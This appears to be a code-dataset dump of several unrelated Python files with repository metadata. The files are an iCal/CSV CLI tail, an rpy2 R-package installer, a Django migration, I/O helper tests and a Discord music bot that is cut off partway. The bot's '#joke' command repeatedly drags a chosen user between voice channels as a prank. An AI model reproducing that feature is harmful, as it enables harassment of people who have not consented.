'back to a file, again either .ics (preferred) or .csv.',
epilog='')
parser.add_argument(
'file',
help='the file to load, either .csv or .ics (preferred)',
type=str)
parser.add_argument(
'-o',
'--output',
help='the file to write to, either .csv or .ics (preferred)',
type=str,
action=CustomAction)
parser.add_argument(
'-f',
'--filter',
help='rules to filter which component types (events, todos, alarms, ' +
'journals, freebusy-indicators) to keep / sort out',
type=str,
action=CustomAction)
parser.add_argument(
'-s',
'--setup',
help='json-string containing options, e.g. ' +
'{"VEVENT": {"defined_properties": ' +
'{"ATTENDEE": [-1, "Property"]}}} ' +
'to ignore the ATTENDEE property when parsing',
type=str)
parser.add_argument(
'-c',
'--component',
help='component type stored in the .csv-file (one of: events ' +
'[VEVENT], todos [VTODO], alarms [VALARM], journals [VJOURNAL], ' +
'freebusy-indicators [VFREEBUSY]); if no component is specified ' +
'events [VEVENT] are assumed to be the input / desired output',
type=str,
default='VEVENT')
parser.add_argument(
'-v',
'--verbosity',
action='count',
help='increase verbosity',
default=0)
args = parser.parse_args()
# setup logging
logging_config = log.config
if args.verbosity >= 3:
logging_config['handlers']['console']['level'] = 'DEBUG'
elif args.verbosity == 2:
logging_config['handlers']['console']['level'] = 'INFO'
elif args.verbosity == 1:
logging_config['handlers']['console']['level'] = 'WARNING'
else:
logging_config['handlers']['console']['level'] = 'ERROR'
logging.config.dictConfig(logging_config)
# setup ICalTool
tool = ICalTool()
    if args.setup is not None:
tool.setup(json.loads(args.setup))
# load file
tool.load(args.file, component=args.component)
# do whatever
    if 'ordered_args' not in args:
logger.error('nothing to do with the loaded data - exiting')
return
# process actions in order of flags
for arg, value in args.ordered_args:
if arg == 'output':
if value == args.file:
logger.error('please don\'t attempt to overwrite your input ' +
'file - while it is technically possible it seems unwise ' +
"\n cancelling")
continue
tool.write(value, component=args.component)
elif arg == 'filter':
tool.filter(value)
if __name__ == '__main__':
main()
| 33.630072
| 83
| 0.544461
| 9,545
| 0.677383
| 0
| 0
| 0
| 0
| 0
| 0
| 4,596
| 0.326166
|
55895bd32cc5eee1e655399e93c373ec1fa66d6b
| 1,462
|
py
|
Python
|
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | null | null | null |
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | null | null | null |
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | 1
|
2022-01-04T19:33:06.000Z
|
2022-01-04T19:33:06.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 11 18:00:28 2021
@author: Mohammad Eslami
"""
try:
import rpy2
print('===> rpy2 version: ', rpy2.__version__)
from rpy2.robjects.packages import importr
# import rpy2's package module
import rpy2.robjects.packages as rpackages
# R vector of strings
from rpy2.robjects.vectors import StrVector
except:
print('===> Something is wrong: rpy2 is not available!')
# import R's "base" package
lib_base = importr('base')
# import R's "utils" package
lib_utils = importr('utils')
# select a mirror for R packages
lib_utils.chooseCRANmirror(ind=1) # select the first mirror in the list
# R package names
packnames = ('visualFields', 'vfprogression')
# Selectively install what needs to be installed.
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
lib_utils.install_packages(StrVector(names_to_install))
try:
lib_vf = importr('visualFields')
print('===> visualFields R package is installed/loaded successfully!')
lib_vfprogression = importr('vfprogression')
print('===> vfprogression R package is installed/loaded successfully!')
except:
print('===> Something is wrong: R packages are not available!')
# try:
# import PyVisualFields
# print('===> PyVisualFields package loaded successfully!')
# except:
# print('===> Something is wrong: PyVisualFields is not available!')
| 27.584906
| 75
| 0.699042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 832
| 0.569083
|
5589cd912e691b17322bc09642b9a8ec0453acc9
| 8,949
|
py
|
Python
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | 1
|
2021-06-17T05:09:00.000Z
|
2021-06-17T05:09:00.000Z
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-04 19:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('financial_activities', '0004_merge_20160928_1603'),
]
operations = [
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='by_direct_reimbursable_fun',
new_name='by_direct_reimbursable_funding_source',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='deobligations_recov_by_pro_cpe',
new_name='deobligations_recoveries_refund_pri_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obli_inc_by_prog_obj_class',
new_name='drv_obligations_incurred_by_program_object_class',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obligations_undel_ord_unp',
new_name='drv_obligations_undelivered_orders_unpaid',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_cpe',
new_name='gross_outlay_amount_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_fyb',
new_name='gross_outlay_amount_by_program_object_class_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_cpe',
new_name='gross_outlays_delivered_orders_paid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_fyb',
new_name='gross_outlays_delivered_orders_paid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_cpe',
new_name='gross_outlays_undelivered_orders_prepaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_fyb',
new_name='gross_outlays_undelivered_orders_prepaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_cpe',
new_name='obligations_delivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_fyb',
new_name='obligations_delivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_incurred_by_pr_cpe',
new_name='obligations_incurred_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_cpe',
new_name='obligations_undelivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_fyb',
new_name='obligations_undelivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_cpe',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_fyb',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_cpe',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_fyb',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483100_undelivered_or_cpe',
new_name='ussgl483100_undelivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483200_undelivered_or_cpe',
new_name='ussgl483200_undeliv_orders_oblig_transferred_prepaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487100_downward_adjus_cpe',
new_name='ussgl487100_down_adj_pri_unpaid_undel_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487200_downward_adjus_cpe',
new_name='ussgl487200_down_adj_pri_ppaid_undel_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488100_upward_adjustm_cpe',
new_name='ussgl488100_upward_adjust_pri_undeliv_order_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488200_upward_adjustm_cpe',
new_name='ussgl488200_up_adjust_pri_undeliv_order_oblig_ppaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_cpe',
new_name='ussgl490100_delivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_fyb',
new_name='ussgl490100_delivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490200_delivered_orde_cpe',
new_name='ussgl490200_delivered_orders_obligations_paid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_cpe',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_fyb',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl493100_delivered_orde_cpe',
new_name='ussgl493100_delivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497100_downward_adjus_cpe',
new_name='ussgl497100_down_adj_pri_unpaid_deliv_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497200_downward_adjus_cpe',
new_name='ussgl497200_down_adj_pri_paid_deliv_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498100_upward_adjustm_cpe',
new_name='ussgl498100_upward_adjust_pri_deliv_orders_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl498200_upward_adjustm_cpe',
new_name='ussgl498200_upward_adjust_pri_deliv_orders_oblig_paid_cpe',
),
]
| 46.853403
| 84
| 0.703766
| 8,799
| 0.983238
| 0
| 0
| 0
| 0
| 0
| 0
| 4,774
| 0.533467
|
558acc49675640913785e7f0a2b6dca8cde8835f
| 2,654
|
py
|
Python
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 16
|
2019-06-21T22:45:59.000Z
|
2020-08-20T22:26:22.000Z
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 15
|
2019-06-21T23:09:59.000Z
|
2020-05-07T03:02:33.000Z
|
tests/unit/utils/test_io_utils.py
|
briannemsick/barrage
|
f86bd0723abc0ab94b0b8f2ca3ffa5e3b7541455
|
[
"MIT"
] | 6
|
2019-06-22T15:27:39.000Z
|
2020-07-06T02:18:55.000Z
|
import json
import os
import pickle
import numpy as np
import pandas as pd
import pytest
from barrage.utils import io_utils
@pytest.fixture()
def sample_dict():
return {"unit": "test"}
def test_save_json(artifact_path, sample_dict):
filename = "unit_test.json"
io_utils.save_json(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "r") as fn:
obj = json.load(fn)
assert obj == sample_dict
def test_save_json_default(artifact_path):
filename = "unit_test.json"
sample_dict = {"unit": np.float32(6.0), "test": np.array([1, 2])}
io_utils.save_json(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "r") as fn:
obj = json.load(fn)
assert obj == {"unit": 6.0, "test": [1, 2]}
def test_load_json(artifact_path, sample_dict):
filename = "unit_test.json"
with open(os.path.join(artifact_path, filename), "w") as fn:
json.dump(sample_dict, fn)
assert os.path.isfile(os.path.join(artifact_path, filename))
obj = io_utils.load_json(filename, artifact_path)
assert obj == sample_dict
def test_save_pickle(artifact_path, sample_dict):
filename = "unit_test.pkl"
io_utils.save_pickle(sample_dict, filename, artifact_path)
assert os.path.isfile(os.path.join(artifact_path, filename))
with open(os.path.join(artifact_path, filename), "rb") as fn:
obj = pickle.load(fn)
assert obj == sample_dict
def test_load_pickle(artifact_path, sample_dict):
filename = "unit_test.pkl"
with open(os.path.join(artifact_path, filename), "wb") as fn:
pickle.dump(sample_dict, fn)
assert os.path.isfile(os.path.join(artifact_path, filename))
obj = io_utils.load_pickle(filename, artifact_path)
assert obj == sample_dict
def test_load_data(artifact_path, sample_dict):
expected = pd.DataFrame([sample_dict])
expected.to_json(os.path.join(artifact_path, "unit_test.json"))
result = io_utils.load_data("unit_test.json", artifact_path)
assert result.equals(expected)
expected.to_csv(os.path.join(artifact_path, "unit_test.csv"), index=False)
result = io_utils.load_data("unit_test.csv", artifact_path)
assert result.equals(expected)
with pytest.raises(FileNotFoundError):
io_utils.load_data("test_unit.42", artifact_path)
expected.to_json(os.path.join(artifact_path, "unit_test.foo"))
with pytest.raises(ValueError):
io_utils.load_data("unit_test.foo", artifact_path)
| 31.223529
| 78
| 0.715901
| 0
| 0
| 0
| 0
| 64
| 0.024115
| 0
| 0
| 237
| 0.089299
|
558cbd4a7ce3e41aaed8e2b86ecb2cf3f058fd07
| 20,998
|
py
|
Python
|
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
script.py
|
kenneth2001/Virus
|
e7d0b650d9d7a4eaab9bd87b3695b791e1f105b1
|
[
"MIT"
] | null | null | null |
import asyncio
import requests
from bs4 import BeautifulSoup
from datetime import date, datetime
import discord
import numpy as np
from urllib.error import HTTPError
import yt_dlp as youtube_dl
from discord.ext import commands
import os
from pytz import timezone
from yt_dlp.utils import DownloadError, ExtractorError
from util.log import pretty_output, pretty_print
from util.preprocessing import load_config, load_gif, load_user
import secrets
try:
print('LOADING config.txt')
TOKEN, TIMEZONE, MODE = load_config('config/config.txt')
print('LOADED config.txt\n')
except:
print('ERROR LOADING config.txt\n')
tz = timezone(TIMEZONE)
token = TOKEN #os.environ['token']
# MODE: 0 = local, 1 = repl.it
# For setting up bot on replit.com
if MODE == 1:
from util.keep_alive import keep_alive
os.environ['MPLCONFIGDIR'] = '/tmp/' #"/home/runner/Virus-demo/tmp"
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
elif MODE == 0:
import matplotlib.pyplot as plt
import sympy
else:
print('UNDEFINED MODE')
exit()
try:
print('LOADING gif.json')
gif = load_gif('config/gif.json')
print('LOADED gif.json\n')
except:
print('ERROR LOADING gif.json\n')
try:
print('LOADING user.json')
user = load_user('config/user.json')
print('LOADED user.json\n')
except:
print('ERROR LOADING user.json\n')
ytdl_format_options = {
'format': 'bestaudio/best',
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
}
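# FFmpeg options: '-vn' drops the video stream (audio only); the reconnect flags
# tell FFmpeg to retry a dropped HTTP stream, waiting at most 5 seconds between retries.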
ffmpeg_options = {
'options': '-vn',
"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5"
}
# channel_var stores all variables for different channels
# key: serverid
# value: 1. activated[bool] - indicates whether the music playing function is activated
# 2. bully[dict] - dict of users being bullied
# 3. ctx[object]
# 4. log[list] - log of users entering / leaving voice channels
# 5. playing[bool] - indicates whether the bot is playing music
# 6. queue[list] - list of music to be played
channel_var = {}
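# Hypothetical example of one entry (illustration only, ids and names are made up):
# channel_var[123456789] = {
#     'ctx': <commands.Context>,
#     'queue': [[webpage_url, stream_url, title], ...],
#     'activated': True, 'playing': True,
#     'log': [['2021-09-18 12:00:00', '*user#1234* Entered `General`'], ...],
#     'bully': {987654321: True},
# }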
# return gif link
def send_gif(msg):
if msg in gif.keys():
return gif[msg]
# Wong Tai Sin Fortune Sticks (黃大仙求籤)
def get_stick(tag):
num = np.random.randint(1, 101)
URL = f'https://andy.hk/divine/wongtaisin/{num}'
page = requests.get(URL)
soup = BeautifulSoup(page.content, "html.parser")
result = soup.find(id='content')
job_elements = result.find("div", class_="inner-padding col-md-5 col-md-offset-7")
stick_no = job_elements.find('h2', class_='id-color text-center').text
stick_author = job_elements.find_all('h4', class_='text-center')[0].text
stick_content = job_elements.find_all('h4', class_='text-center')[1].text
stick_explain = job_elements.text.split('仙機:')[1].split('解說及記載:')[0]
stick_story = job_elements.text.split('仙機:')[1].split('解說及記載:')[1].split('■')[0]
text = tag + '求得' + stick_no + '\n' + stick_author + '\n\n籤文:\n' + stick_content + '\n\n仙機:' + stick_explain + '\n解說及記載' + stick_story
return text
client = commands.Bot(command_prefix='#', help_command=None)
@client.event
async def on_connect():
print("Bot activated successfully")
async def initialize(server_id: int, ctx: object=None):
"""Initializing channel_var
Args:
server_id (int)
ctx (object, optional): Defaults to None.
"""
global channel_var
info = channel_var.get(server_id, -1)
if info != -1:
if channel_var[server_id]['ctx'] == None and ctx != None:
channel_var[server_id]['ctx'] = ctx
return
else:
channel_var[server_id] = {'ctx':ctx, 'queue':[], 'activated':False, 'playing':True, 'log':[], 'bully':{}}
@client.event
async def on_voice_state_update(member, before, after):
server_id = member.guild.id
await initialize(server_id)
global channel_var
if before.channel is None and after.channel is not None:
channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Entered `' + str(after.channel) + '`'])
    if before.channel is not None and after.channel is None:
        channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Left `' + str(before.channel) + '`'])
    if before.channel is not None and after.channel is not None:
        channel_var[server_id]['log'].append([datetime.now(tz).strftime('%Y-%m-%d %H:%M:%S'), '*' + str(member) + '* Left `' + str(before.channel) + '`, Joined `' + str(after.channel) + '`'])
@client.command(name='log')
async def log(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if len(channel_var[ctx.guild.id]['log']) == 0:
return
embed = discord.Embed(color = discord.Colour.red())
embed.set_author(name='Log (Recent 20 records)')
for field in channel_var[ctx.guild.id]['log'][-20:]:
embed.add_field(name=field[0], value=field[1], inline=False)
await ctx.send(embed=embed)
async def play_music(ctx):
while not client.is_closed():
global channel_var
if not len(channel_var[ctx.guild.id]['queue']) == 0 and ctx is not None:
server = ctx.message.guild
voice_channel = server.voice_client
if (voice_channel and voice_channel.is_connected() and not voice_channel.is_playing() and channel_var[ctx.guild.id]['playing']) == True:
server = ctx.message.guild
voice_channel = server.voice_client
try:
link = channel_var[ctx.guild.id]['queue'][0][1]
title = channel_var[ctx.guild.id]['queue'][0][2]
player = discord.FFmpegPCMAudio(link, **ffmpeg_options)
voice_channel.play(player)
await ctx.send(f'**Now playing:** {title}')
except DownloadError:
await ctx.send(f'**Download error:** {title}')
del(channel_var[ctx.guild.id]['queue'][0])
await asyncio.sleep(1)
@client.command(name='play')
async def play(ctx, *url):
url = ' '.join(url)
await initialize(ctx.guild.id, ctx)
global channel_var
def music(link):
with youtube_dl.YoutubeDL(ytdl_format_options) as ydl:
info = ydl.extract_info(link, download=False)
# Handle if the url is a playlist
if 'entries' in info:
info = info['entries'][0]
LINK = info['webpage_url']
URL = info['url']
TITLE = info['title']
return LINK, URL, TITLE
if not ctx.message.author.voice: # handle if message author is not inside any voice channel
await ctx.send("**You are not connected to a voice channel**")
return
elif ctx.message.guild.voice_client: # if bot is inside any voice channel
if ctx.message.guild.voice_client.channel != ctx.message.author.voice.channel: # if bot is not inside the author's channel
channel = ctx.message.author.voice.channel
user = await ctx.guild.fetch_member(client.user.id)
ctx.voice_client.pause()
await user.move_to(channel)
ctx.voice_client.resume()
else: # if bot is not inside any voice channel
channel = ctx.message.author.voice.channel
await channel.connect() # connect to message author's channel
server = ctx.message.guild
voice_channel = server.voice_client
if url is None or url == '':
if len(channel_var[ctx.guild.id]['queue']) == 0:
return
else:
try:
link, player_link, title = music(url)
channel_var[ctx.guild.id]['queue'].append([link, player_link, title])
except ExtractorError:
await ctx.send('**Error:** ' + url)
except HTTPError:
await ctx.send('**Error:** ' + url)
except DownloadError:
await ctx.send('**Error:** ' + url)
# activate music playing function
if channel_var[ctx.guild.id]['activated'] == False:
channel_var[ctx.guild.id]['activated'] = True
await play_music(ctx)
@client.command(name='debug')
async def debug(ctx):
def check(m):
return m.author == ctx.message.author
func_token = secrets.token_hex(10)
print("Token:", func_token)
await ctx.send('**Please type in the token displayed in console**')
msg = await client.wait_for("message", check=check)
if msg.content == func_token:
pretty_print(channel_var)
pretty_output(channel_var, filename='tmp.json')
await ctx.send(file=discord.File('tmp.json'))
else:
await ctx.send("**Only admin can use this command**")
@client.command(name='queue')
async def queue_(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if len(channel_var[ctx.guild.id]['queue']) == 0:
await ctx.send('**Queue is empty!**')
else:
async with ctx.typing():
await ctx.send('\n'.join([f'{idx}. {item[2]}\n{item[0]}' for idx, item in enumerate(channel_var[ctx.guild.id]['queue'], start=1)]))
@client.command(name='stop')
async def stop(ctx):
voice_client = ctx.message.guild.voice_client
await voice_client.disconnect()
@client.command(name='gpa')
async def gpa(ctx):
x = round(np.random.uniform(3,4) - np.random.normal(0, 1), 2)
text = 4.0 if x > 4 else x
if text >= 3.8:
text = "Predicted GPA: " + str(text)
elif text >= 3.0:
text = "Predicted GPA: " + str(text)
elif text >= 2.5:
text = "Predicted GPA: " + str(text)
else:
text = "Predicted GPA: " + str(text)
tag = "<@" + str(ctx.message.author.id) + ">"
await ctx.message.channel.send(str(text)+tag)
@client.command(name='pause')
async def pause(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
channel_var[ctx.guild.id]['playing'] = False
if ctx.voice_client is not None:
ctx.voice_client.pause()
await ctx.send('**Paused**')
@client.command(name='resume')
async def resume(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
channel_var[ctx.guild.id]['playing'] = True
if ctx.voice_client is not None:
ctx.voice_client.resume()
await ctx.send('**Resumed**')
@client.command(name='skip')
async def skip(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
if ctx.voice_client is not None:
ctx.voice_client.stop()
await ctx.send('**Skipped**')
@client.listen()
async def on_message(message):
author = message.author
author_id = str(message.author.id)
tag = "<@" + str(message.author.id) + ">"
msg = message.content.lower()
if author == client.user:
return
#print('Debugging:', author, msg)
today = date.today()
if user.get(author_id, -1) != -1:
if user[author_id]['date'] != today:
user[author_id]['date'] = today
await message.channel.send(user[author_id]['text'] + tag)
if message.content.startswith('#hello'):
await message.channel.send("Hello World!")
gif = send_gif(msg)
if gif is not None:
await message.channel.send(gif)
@client.command(name='help')
async def help(ctx):
embed = discord.Embed(title="Virus", url="https://github.com/kenneth2001/virus", description="Discord Bot developed by YeeKiiiiii 2021", color=discord.Colour.blue())
embed.set_author(name="Virus", url="https://github.com/kenneth2001/virus", icon_url="https://user-images.githubusercontent.com/24566737/132656284-f0ff6571-631c-4cef-bed7-f575233cbf5f.png")
embed.add_field(name=':musical_note: __Music__', value="""1. `#play [url]` Play music, tested platform: Youtube, Soundcloud
2. `#pause` Pause music
3. `#resume` Resume music
4. `#skip` Play next song
5. `#queue` Display the queue
6. `#stop` Kick the bot from voice channel""", inline=False)
embed.add_field(name=':pencil2: __Graph (Developing)__', value="""1. `#plot` Create simple scatter/line plot""", inline=False)
    embed.add_field(name=':black_joker: __Kidding__', value="""1. `#joke [userid] [times] [duration]`
    Move a specified user into random voice channels randomly and repeatedly
    2. `#leavemealone` Stop yourself from being bullied
    3. `#save [userid]` Rescue your friend from cyber-bullying""", inline=False)
embed.add_field(name=':man_office_worker: __Other__', value="""1. `#stick` Fortune sticks from Wong Tai Sin
2. `#gpa` Get prediction of your GPA (Maximum: 4.0)
    3. `#help` Display a list of all commands available
4. `#credit` Display information of the bot developer
5. `#hello` Return 'hello world'
6. `#ping` Return latency
    7. `#log` Display the previous 20 in/out users
8. `#clear` Delete previous 30 messages sent by this bot / started with '#'
9. `#debug` Check parameters (for debugging)""", inline=False)
embed.add_field(name=':new: __New Features (Experimental)__', value="""1. `#when` Return the start time of the bot
2. `#dm [userid] [message]` Send message to any user privately""" )
embed.add_field(name=':frame_with_picture: __GIF__', value="Automatically return GIF if the message matches the following keywords\n`" + '` `'.join(gif.keys()) +'`', inline=False)
embed.set_footer(text="Last updated on 25 December 2021")
await ctx.send(embed=embed)
@client.command(name='ping')
async def ping(ctx):
await ctx.send(f'In {round(client.latency * 1000)}ms')
@client.command(name='stick')
async def stick(ctx):
tag = "<@" + str(ctx.message.author.id) + ">"
text = get_stick(tag)
await ctx.send(text)
@client.command(name='credit')
async def credit(ctx):
await ctx.send('Created By kenneth\nLast Update On 18/9/2021\nhttps://github.com/kenneth2001')
@client.command(name='clear')
async def clear(ctx):
def is_bot(m):
try:
return m.author == client.user or m.content[0] == '#'
except:
return False
deleted = await ctx.message.channel.purge(limit=30, check=is_bot)
await ctx.send('Deleted {} message(s)'.format(len(deleted)), delete_after=10)
@client.command(name='joke')
async def joke(ctx, userid=None, n=10, sleep_time=0.5):
await initialize(ctx.guild.id, ctx)
global channel_var
try:
userid = int(userid)
user = await ctx.guild.fetch_member(userid)
info = channel_var[ctx.guild.id]['bully'].get(userid, -1)
if info == -1:
channel_var[ctx.guild.id]['bully'][userid] = True
channel_var[ctx.guild.id]['bully'][userid] = True
tag1 = "<@" + str(ctx.message.author.id) + ">"
tag2 = "<@" + str(userid) + ">"
await ctx.send(tag1 + " is pranking " + tag2)
await ctx.send('To stop, type #leavemealone')
except:
tag = "<@" + str(ctx.message.author.id) + ">"
await ctx.send('Please provide a valid user id!' + tag)
return
while(n > 0):
if channel_var[ctx.guild.id]['bully'][userid] == False:
return
try:
if user.voice is not None:
await user.move_to(np.random.choice(ctx.guild.voice_channels))
n -= 1
except:
pass
await asyncio.sleep(sleep_time)
def generate_question():
question = ""
for i in range(6):
question += str(np.random.randint(1, 21))
question += np.random.choice(['*', '+', '-'])
question += str(np.random.randint(1, 21))
return question
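# Note (illustrative): successive iterations are concatenated directly, so the trailing
# number of one "A<op>B" chunk merges with the leading number of the next, e.g.
# "5*3" + "17-2" + ... -> "5*317-2..."; the result is still a valid arithmetic expression.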
@client.command(name='leavemealone')
async def leavemealone(ctx):
await initialize(ctx.guild.id, ctx)
global channel_var
info = channel_var[ctx.guild.id]['bully'].get(ctx.message.author.id, -1)
if info == -1:
channel_var[ctx.guild.id]['bully'][ctx.message.author.id] = True
def check(m):
return m.author == ctx.message.author
    question = generate_question()
    await ctx.send('Question: `'+question+'`\nType your answer:')
    # sympy is only imported when MODE == 0; mirror the MODE handling used in #save
    if MODE == 0:
        answer = int(sympy.sympify(question))
    elif MODE == 1:
        answer = int(eval(question))
    print('Answer:', answer)
msg = await client.wait_for("message", check=check)
tag = "<@" + str(ctx.message.author.id) + ">"
if int(msg.content) == answer:
channel_var[ctx.guild.id]['bully'][ctx.message.author.id] = False
await ctx.send("Good Job" + tag)
else:
await ctx.send("on9" + tag)
@client.command(name='save')
async def save(ctx, id=None):
if id is None:
await ctx.send("You must specify an id")
return
await initialize(ctx.guild.id, ctx)
global channel_var
userid = int(id)
def check(m):
return m.author == ctx.message.author
if channel_var[ctx.guild.id]['bully'].get(userid, -1) == -1:
await ctx.send("This user is not under bully list")
elif channel_var[ctx.guild.id]['bully'][userid] == False:
await ctx.send("This user is not being bullied")
else:
question = generate_question()
await ctx.send('Question: `'+question+'`\nType your answer:')
if MODE == 0:
answer = int(sympy.sympify(question))
elif MODE == 1:
answer = int(eval(question))
print('Answer:', answer)
msg = await client.wait_for("message", check=check)
tag = "<@" + str(ctx.message.author.id) + ">"
if int(msg.content) == answer:
channel_var[ctx.guild.id]['bully'][userid] = False
await ctx.send("Good Job" + tag)
else:
await ctx.send("Be careful" + tag)
# experimental
@client.command(name='plot')
async def plot(ctx):
def check(m):
return m.author == ctx.message.author
await ctx.send("1. Please Enter The Type of The Plot")
await ctx.send("a: scatter plot, b: line plot")
msg = await client.wait_for("message", check=check)
graph_type = msg.content
await ctx.send("2. Please enter the x-coordinate for all points (seperated by comma)")
msg = await client.wait_for("message", check=check)
x = [int(i) for i in msg.content.split(',')]
await ctx.send("3. Please enter the y-coordinate for all points (seperated by comma)")
msg = await client.wait_for("message", check=check)
y = [int(i) for i in msg.content.split(',')]
